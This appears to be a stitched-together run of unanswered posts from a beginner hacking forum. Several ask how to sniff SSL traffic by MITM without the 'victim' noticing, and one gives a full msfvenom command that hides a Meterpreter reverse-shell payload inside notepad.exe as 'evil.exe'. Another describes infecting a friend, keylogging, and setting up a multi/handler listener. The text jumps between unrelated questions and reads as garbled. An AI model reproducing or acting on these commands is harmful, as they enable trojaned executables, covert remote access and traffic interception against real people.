Hello everyone, whenever I try to use MITM manually with sslstrip and ettercap or with the automated script Websploit it kills the Internet connection of the victim. i tried that in my 2 wifi networks and same people . how can I sniff ssl traffic without killing the internet connection ?

I have copied notepad.exe form my Windows machine to Kali to use as a template and did this command msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.144 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 2000 -f exe > evil.exe When I transfer the evil.exe to my computer and run it I don't get a response from the file. I do have a handler running with said payload.

However, since real world hacking is illegal and they don't participate in this, how do they know their skills are up to snuff if they aren't penetration testers? Hey,again a bad question from my side, because the more I know, the less I know :DI know that there are two types of ip adresses.Local ip adresses are inside my LAN e.g. 192.168.0.X or something like that.But there's also the external ip adress which is normally the ip adress of my router, isn't it?

I noticed there's a script called "katoolin" that installs Kali's tools into Ubuntu, i wanted to know if anybody here tried this and if it's a suitable replacement of Kali. I injected a friend with a virus(he knows) that has this thing multi/handler. it sent bytes and everything.I had an open session and i interacted.the keylogging thing and the rest works.but when i background and close it and i enter msfconsole again and use exploit/multi/handler set LHOST ... set LPORT... and setpayload windows/meterpreter/reversetcp...exploit -j it doesnt work.. i have no active sessions.i portforwarded and everything and i used my public ip. and still...
